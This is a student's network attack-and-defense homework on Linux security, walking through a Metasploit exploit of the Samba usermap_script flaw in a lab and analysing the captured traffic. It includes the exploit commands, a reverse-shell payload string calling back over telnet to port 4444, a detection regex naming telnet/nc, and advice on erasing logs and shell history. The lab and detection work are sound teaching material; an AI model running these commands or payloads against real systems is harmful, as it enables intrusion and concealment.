20199106 2019-2020-2 "Network Attack and Defense Practice" Week 8 Assignment

Job description

Which course does this assignment belong to: Network Attack and Defense Practice
What are the requirements for this assignment: Eighth homework: attack and defense of the Linux operating system
My goal in the course: Gain a relatively comprehensive understanding of network attack and defense techniques and be able to carry out basic offensive and defensive operations.
What specific aspect of this assignment helped me achieve my goal: Learned the body of knowledge on attacking and defending Linux systems.

Homework

Practice content

Linux operating system basic framework

  • Advantages of the Linux operating system: open source and free, cross-platform hardware support, rich software support, multi-user and multi-tasking, reliable security (firewall, intrusion detection and security certification tools, with system vulnerabilities repaired promptly), good stability, and complete networking functionality.

  • Linux system structure :

  • Linux process and thread management: the Linux kernel is a preemptive multi-user, multi-process system; many processes are active concurrently, and the kernel's process management module schedules the hardware resources they use.
  • Linux memory management: the memory management module lets multiple processes share physical memory safely. On 32-bit x86 each process has an independent 4GB virtual address space: the kernel code and data are mapped into the top 1GB (above 3GB) and the process's own user space occupies 0-3GB.
  • Linux file system management: the kernel uses the virtual file system (VFS) layer, which supports dozens of different logical file systems.
  • Linux device control: the kernel software that handles or manages a hardware controller is called a device driver. Linux abstracts device handling so that hardware is accessed like ordinary files. Three classes of device are supported: character devices, which are read and written directly without buffering; block devices, which are read and written in units of blocks; and network devices, which are accessed through network interfaces.
  • Linux networking: the kernel's network module provides access to multiple network standards and supports a wide range of network hardware. It is divided into the network protocol stack, which implements the transport protocols, and the network drivers, which communicate with the hardware.
  • Linux system calls: the kernel modules above run in CPU kernel mode, while applications run in user mode. The system call interface is the path by which applications reach hardware devices and other kernel-managed resources, which protects the stability and security of the whole system.

Linux operating system security mechanism

  • Identity authentication mechanism

    • Linux manages identity by creating users and user groups with several role types, so that multiple users can use the system safely;
    • User categories: root (the superuser, UID 0), ordinary users and system users; user information is stored in /etc/passwd (password hashes in /etc/shadow);
    • A user group is a set of accounts that share the same characteristics; group information is stored in /etc/group;
    • Linux supports both local-login and remote-login user authentication.
    • Linux's unified authentication middleware is PAM (Pluggable Authentication Modules), which offers four management interfaces: authentication management, account management, password management and session management.
  • Authorization and access control mechanism

    • Access control for all files and device resources is implemented through the VFS virtual file system layer.
    • In Linux's VFS security model, authorization and access control are carried out through the file owner, the file permission bits and a few special bits (set-uid, set-gid and sticky).
    • Deficiency: permissions can only be assigned to three classes, the owner, the owner's group and everyone else, so finer-grained control is not possible without extensions such as POSIX ACLs.
  • Security audit mechanism

    • Mainly implemented by three log subsystems:
      • Connection-time logs: written by several programs (utmp, wtmp, lastlog), letting the administrator follow who logged in, when and from where.
      • Process accounting logs: when a process terminates, a record for it is written to the process accounting file.
      • Error logs: handled by the general logging service (syslog).

Linux system remote attack and defense technology

  • Attack process against linux system:

    • First, footprinting, scanning and enumeration are used to collect information about the target Linux system;
    • Then the attacker exploits a security vulnerability or configuration weakness in a listening network service from the remote network to obtain local shell access;
    • Once a shell is obtained, the attacker has a foothold on the target Linux system and moves on to local attacks.
  • Linux remote password guessing attack

    • Basic form: enumerate account names through the service, or target default built-in accounts (such as root), then guess their passwords. Besides remote-administration services such as SSH, services that carry their own account systems and authentication, such as HTTP/HTTPS and FTP, can also be guessed.
    • Automated remote password guessing tools: Brutus, THC Hydra, Cain and Abel
    • Best defense: use strong passwords that are not easy to guess
    • Practical measures: run services vulnerable to remote password guessing on non-standard ports; use password-guessing detection and defense software; use the Linux firewall (iptables) to restrict the source IP range allowed to reach such services, SSH in particular.
  • Linux network service remote penetration attack

    • The most important channel for remote penetration of a system is the exploitation of security vulnerabilities in network services.
    • Network services in the LAMP web stack: Linux as the server platform, Apache serving HTTP/HTTPS, MySQL as the back-end data store, and PHP for developing and running the web applications. Precisely because LAMP dominates web servers, the service extension modules in that combination have become the main remote penetration targets on Linux.
    • FTP, Samba and other file sharing services: FTP is used for file exchange and shared transfer and normally listens on TCP ports 20 and 21; Samba listens on TCP 139 and 445.
    • Email service (sendmail): the most popular mail transfer agent on UNIX-like systems including Linux, and one of the well-known insecure network services.
    • Other network services: OpenSSH (TCP 22), HTTPS served through OpenSSL (TCP 443), NFS (TCP/UDP 2049), SNMP (UDP 161/162), SunRPC portmapper (TCP 111), BIND (TCP/UDP 53), X Window System (TCP 6000).
    • Precautions: disable unnecessary network services; prefer safer protocols and service software; update service versions promptly; use xinetd and add network access control for Linux network services; establish intrusion detection and an emergency response plan.
  • Attack Linux client programs and users

    • Attacking client programs on Linux: the client programs Internet users run most are the web browser and the email client; on Linux the most popular browser is Firefox and the most popular email client is Thunderbird.
    • Attacking Linux users: when the server is hard to break, social engineering can be used to obtain information from the server administrator by phone, email and other means, or to get them to run a malicious program.
    • Precautions: update software regularly (apt-get), understand social engineering techniques, and raise security awareness.
  • Attack linux routers and listeners

    • When Linux acts as a router, or when an interface is in promiscuous mode, flaws in the program that implements routing and packet forwarding can be attacked with crafted packets.
    • Setting ip_forward = 1 (net.ipv4.ip_forward, via /proc/sys or sysctl) turns on router mode; route.c in the net subsystem implements route lookup and packet forwarding.
    • Attacking sniffers and intrusion detectors: the libpcap capture library, the tcpdump command-line tool, the Wireshark network monitoring and protocol analysis software, and the Snort intrusion detection system. All of them except libpcap have had flaws of one kind or another.
    • Precautions: network administrators should adopt an adversarial, game-like mindset and master the penetration and intrusion methods used by attackers.
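The "password guessing detection" measure listed under remote password guessing above, as an added example that is not part of the original post: it scans the lines sshd writes to /var/log/auth.log, flags any source that piles up failed logins inside a sliding window, and renders the iptables rule that restricts that source. The log lines are constructed for the example; the threshold, window and function names are my own choices.

```python
"""Detect remote password guessing against SSH from auth.log lines."""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Matches sshd's "Failed password" lines, with or without "invalid user".
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2}\s\d{2}:\d{2}:\d{2})\s\S+\ssshd\[\d+\]:\s"
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

# Constructed sample log: six failures in ten seconds from one host, one
# isolated failure from another host, and one legitimate login.
SAMPLE_AUTH_LOG = """\
Apr 22 04:50:01 metasploitable sshd[2311]: Failed password for root from 192.168.200.2 port 51234 ssh2
Apr 22 04:50:03 metasploitable sshd[2313]: Failed password for root from 192.168.200.2 port 51236 ssh2
Apr 22 04:50:04 metasploitable sshd[2315]: Failed password for invalid user admin from 192.168.200.2 port 51238 ssh2
Apr 22 04:50:06 metasploitable sshd[2317]: Failed password for root from 192.168.200.2 port 51240 ssh2
Apr 22 04:50:08 metasploitable sshd[2319]: Failed password for invalid user admin from 192.168.200.2 port 51242 ssh2
Apr 22 04:50:11 metasploitable sshd[2321]: Failed password for root from 192.168.200.2 port 51244 ssh2
Apr 22 04:51:40 metasploitable sshd[2330]: Failed password for msfadmin from 10.0.0.7 port 40110 ssh2
Apr 22 04:55:30 metasploitable sshd[2400]: Accepted password for msfadmin from 192.168.200.50 port 40120 ssh2
"""


def parse_failures(lines: List[str]) -> Dict[str, List[Tuple[datetime, str]]]:
    """Group (timestamp, username) of every failed login by source IP."""
    failures: Dict[str, List[Tuple[datetime, str]]] = defaultdict(list)
    for line in lines:
        m = FAILED_RE.match(line)
        if not m:
            continue  # accepted logins and unrelated lines are ignored
        # syslog timestamps carry no year; ordering within one log still holds
        ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S")
        failures[m.group("ip")].append((ts, m.group("user")))
    return failures


def detect_bruteforce(lines: List[str], threshold: int = 5,
                      window: timedelta = timedelta(seconds=60)) -> Dict[str, dict]:
    """Flag every source IP with at least `threshold` failures inside any `window`."""
    alerts: Dict[str, dict] = {}
    for ip, events in parse_failures(lines).items():
        events.sort()
        lo, peak = 0, 0
        for hi in range(len(events)):
            # slide the window start forward until it spans at most `window`
            while events[hi][0] - events[lo][0] > window:
                lo += 1
            peak = max(peak, hi - lo + 1)
        if peak >= threshold:
            alerts[ip] = {
                "peak_failures": peak,
                "users": sorted({user for _, user in events}),
                "first": events[0][0],
                "last": events[-1][0],
            }
    return alerts


def iptables_block_rules(alerts: Dict[str, dict], port: int = 22) -> List[str]:
    """Render one DROP rule per flagged source (the iptables measure above)."""
    return [f"iptables -I INPUT -p tcp --dport {port} -s {ip} -j DROP"
            for ip in sorted(alerts)]


if __name__ == "__main__":
    found = detect_bruteforce(SAMPLE_AUTH_LOG.splitlines())
    for ip, info in found.items():
        print(f"{ip}: {info['peak_failures']} failures, users {info['users']}")
    print("\n".join(iptables_block_rules(found)))
```

A sliding window rather than a plain count per IP keeps a slow, legitimate user who mistypes a password a few times over an hour from being blocked, while a burst from one source is caught even if the attacker rotates usernames.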

Linux system local security attack and defense technology

  • linux local privilege escalation

    • Crack the root password, then run su or sudo to elevate;
    • Find and exploit security vulnerabilities in the su or sudo programs themselves;
    • Attack user-mode SUID programs: local buffer overflows in SUID programs, symbolic-link attacks, race conditions, and attacks on the shared libraries a SUID program loads;
    • Exploit privilege escalation vulnerabilities in Linux kernel code;
    • Search the system for world-writable sensitive files and directories and abuse them;
    • Precautions: upgrade privileged programs and the kernel promptly to fix local privilege vulnerabilities; avoid using root for daily work.
  • Covering tracks on a Linux system

    • The main audit logs live under /var/log; event auditing is provided by the kernel, syslogd and the various network services.
    • To alter the logs of current activity, first look at the /etc/syslog.conf configuration file: authentication and authorization events are recorded in /var/log/auth.log, and system alerts, informational messages and some authentication logs go to /var/log/messages.
    • Clean the history of commands typed into the shell (the .bash_history file).
    • Precautions: write logs to media that are hard to modify; forward critical logs to a separate, strictly protected log server.
  • Linux system remote control backdoor program

    • Types of remote control backdoors implanted on Linux systems: trojanized system programs, command-line backdoor tools, and graphical backdoor tools
    • Graphical remote control software VNC
    • Using rootkit technology to hide backdoor programs
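The permission model described under authorization and access control and the local privilege escalation entries above (SUID programs, world-writable sensitive files and directories) both come down to inspecting mode bits. The following audit script is an added example, not code from the original post: it walks a directory tree and reports set-uid/set-gid executables, world-writable files and world-writable directories that lack the sticky bit. Function and category names are my own choices.

```python
"""Audit a directory tree for local privilege-escalation footholds."""
import os
import stat
from typing import Dict, List


def classify(st: os.stat_result) -> List[str]:
    """Return the finding categories that apply to one inode's mode bits."""
    findings: List[str] = []
    mode = st.st_mode
    if stat.S_ISREG(mode):
        if mode & stat.S_ISUID:
            findings.append("suid")
        if mode & stat.S_ISGID:
            findings.append("sgid")
        if mode & stat.S_IWOTH:
            findings.append("world_writable_file")
    elif stat.S_ISDIR(mode):
        # A shared directory such as /tmp is acceptable only with the sticky
        # bit, which stops other users from deleting or renaming your files.
        if mode & stat.S_IWOTH and not mode & stat.S_ISVTX:
            findings.append("world_writable_dir_no_sticky")
    return findings


def audit_tree(root: str) -> Dict[str, List[str]]:
    """Walk `root` without following symlinks and group paths by finding."""
    report: Dict[str, List[str]] = {}
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            try:
                # lstat: judge the link itself, never what it points at
                st = os.lstat(path)
            except OSError:
                continue  # unreadable entries are skipped, not fatal
            if stat.S_ISLNK(st.st_mode):
                continue
            for category in classify(st):
                report.setdefault(category, []).append(path)
    return report


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "/usr/bin"
    for category, paths in sorted(audit_tree(target).items()):
        print(f"{category}:")
        for p in paths:
            print("   ", p)
```

Run it against / as root for a full picture; the "suid" list is the set of programs whose bugs would hand an ordinary user root, and anything under "world_writable_file" that is a script, a configuration file or a cron job is a direct escalation path.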

Experiment procedure

Hands-on practice: Using Metasploit for Linux remote penetration attacks

Task: use the Metasploit penetration testing software to attack the usermap_script vulnerability in the Samba service of a Linux target machine and obtain access to the host. The practical steps are as follows:

1. Start Metasploit; msfconsole, msfgui or msfweb may be used according to personal preference;

2. Use the exploit module exploit/multi/samba/usermap_script;

3. Choose a remote shell as the PAYLOAD (either a bind or a reverse connection will do);

4. Set the attack parameters (RHOST, LHOST, TARGET, etc.);

5. Launch the exploit;

6. Check that a remote shell was obtained and what privileges it carries.

(Samba is free software that implements the SMB protocol on Linux and UNIX systems, consisting of a client and a server. SMB is a protocol for sharing files and printers over a local area network: a server offers shares, and clients use the file systems, printers and other resources it exposes. With suitable configuration, resources can also be shared with computers anywhere on the Internet.

usermap_script refers to Samba's "username map script" option. The vulnerability arises when a non-default username map script is configured: Samba passes the client-supplied username to that script through the shell, so by sending a username containing shell metacharacters an attacker can execute arbitrary commands.)

Lab environment

Target machine: Linux Metasploitable, 192.168.200.125
Attacker machine: Kali, 192.168.200.2

The experimental process is similar to the seventh week.

1. Run the msfconsole command to start the penetration framework

2. Use the search samba command to find modules that attack the Samba service

3. Use the command use exploit/multi/samba/usermap_script to select the exploit module

4. Use show payloads to view the available payload modules

5. The command set PAYLOAD cmd/unix/reverse selects the attack payload; this payload makes the target connect back to the attacker (a reverse shell carried over telnet). Use show options to view the parameters that need to be configured

6. Set the attacker's address with set LHOST 192.168.200.2 and the target's address with set RHOST 192.168.200.125, then run show options again to check them

7. Run exploit to launch the attack, then run shell to open the shell

8. Run whoami to view the current account: it is root, so control of the target operating system with root privileges has been obtained. Run ifconfig to confirm that the target's IP address is correct.

Practice assignment: Offensive and defensive confrontation practice

  • Attacker: use Metasploit, pick a vulnerability found on the Metasploitable target, carry out the penetration attack, gain remote control, and try to further obtain root privileges.

  • Defender: use tcpdump/wireshark/snort to capture the attack traffic to a packet file, then analyze the attack with wireshark/snort: the attacker's IP, the target IP and port, the attack start time, the vulnerability exploited, the shellcode used, and the commands entered on the command line after success.

The same vulnerability as above is chosen, and the attack proceeds as above.
Wireshark is started before the attack, and the packets it captured are then examined.

The attacker's IP address is 192.168.200.2, source port 42395; the target IP is 192.168.200.125, port 139.

So the attack went through a service on port 139. TCP port 139 is the NetBIOS session service, which Samba uses (alongside 445) to provide SMB file and printer sharing compatible with Windows; although opening it provides a sharing service, it is a frequent attacker target, for example for harvesting user names and passwords. The attack therefore exploited the Samba service vulnerability.

Attack launch time: 2020.4.22 04:58:23;

Following the TCP stream of the SMB packets, the shellcode used can be seen as follows:

Explanation of the command:
nohup ("no hang up") runs a command immune to hangups, so the process keeps running after the account logs out or the terminal is closed; sh is the shell interpreter that runs the command; sleep delays the current action for a period of time; telnet 192.168.200.5 4444 connects out to the attacking machine on the control-and-communication port 4444, so that data is passed through that connection; >/dev/null 2>&1 redirects standard output and standard error to /dev/null, discarding everything the command would print; the trailing & runs the command in the background.

Following the TCP stream further shows the commands the attacker ran on the target after the attack succeeded, which confirms it worked: whoami and ifconfig.
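The usermap_script description above and the stream analysis just done can both be turned into a check a defender runs over the capture. The following is an added example, not code from the original post: analyze_account() inspects the account name a client sent in its SMB Session Setup AndX request (the field Wireshark shows as "Account"), where the Metasploit module places the whole nohup backdoor command wrapped in backticks so that Samba's username map script hands it to the shell, and it extracts the attacker's callback address and port from it; check_smb_conf() finds the "username map script" option on the server side that makes the bug reachable. The sample account string and smb.conf fragment are constructed; the sleep value, callback IP, port and script path are assumptions, not values taken from the page's capture.

```python
"""Spot a Samba usermap_script injection and the setting that enables it."""
import re
from typing import Dict, Optional

# Constructed: the account name the exploit module sends, carrying the
# cmd/unix/reverse double-telnet payload discussed above inside backticks.
SAMPLE_ACCOUNT = (
    "/=`nohup sh -c '(sleep 4213|telnet 192.168.200.2 4444|while : ; do sh && break; "
    "done 2>&1|telnet 192.168.200.2 4444 >/dev/null 2>&1 &)'`"
)

# Constructed smb.conf fragment (the script path is an assumed example).
SAMPLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = %h server (Samba %v)
   # the line below is the vulnerable, non-default option
   username map script = /etc/samba/scripts/mapusers.sh
"""

# Characters /bin/sh would interpret if the name reached it unescaped.
SHELL_META = re.compile(r"[`;|&$()<>]")
# Callback used by the reverse shell: "telnet <ip> <port>" (also nc/ncat).
CALLBACK_RE = re.compile(r"\b(?:telnet|nc|ncat)\s+(\d{1,3}(?:\.\d{1,3}){3})\s+(\d{1,5})\b")


def analyze_account(account: str) -> Dict[str, object]:
    """Classify one SMB account name and extract the attacker's callback."""
    # Windows machine accounts legitimately end in "$"; ignore that one case.
    name = account[:-1] if account.endswith("$") else account
    meta = sorted(set(SHELL_META.findall(name)))
    result: Dict[str, object] = {
        "account": account,
        "injection": bool(meta),
        "metachars": meta,
        "callback_ip": None,
        "callback_port": None,
    }
    m = CALLBACK_RE.search(name)
    if m:
        result["callback_ip"] = m.group(1)
        result["callback_port"] = int(m.group(2))
    return result


def check_smb_conf(text: str) -> Optional[str]:
    """Return the configured username map script, or None if the option is unset.

    Samba ignores case and whitespace in parameter names and treats only
    lines starting with '#' or ';' as comments, so normalise the same way.
    """
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", ";")) or "=" not in line:
            continue
        key, value = line.split("=", 1)
        if key.strip().lower().replace(" ", "") == "usernamemapscript":
            return value.strip()
    return None


if __name__ == "__main__":
    verdict = analyze_account(SAMPLE_ACCOUNT)
    print("injection:", verdict["injection"], "metachars:", "".join(verdict["metachars"]))
    print("callback:", verdict["callback_ip"], verdict["callback_port"])
    print("username map script =", check_smb_conf(SAMPLE_SMB_CONF))
```

In a real investigation the account string comes from the Session Setup AndX request in the capture (Wireshark's smb.account field) and the smb.conf from the compromised host; a backtick in a username is never legitimate, and the extracted callback is the IP and port to block and to search for in the other hosts' connection logs.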

Problems encountered in learning and solutions

Learning impression and experience

The operation of this experiment went relatively smoothly, but I am still not very skilled at the analysis and need to study and practice more.

Origin www.cnblogs.com/wyrr/p/12758367.html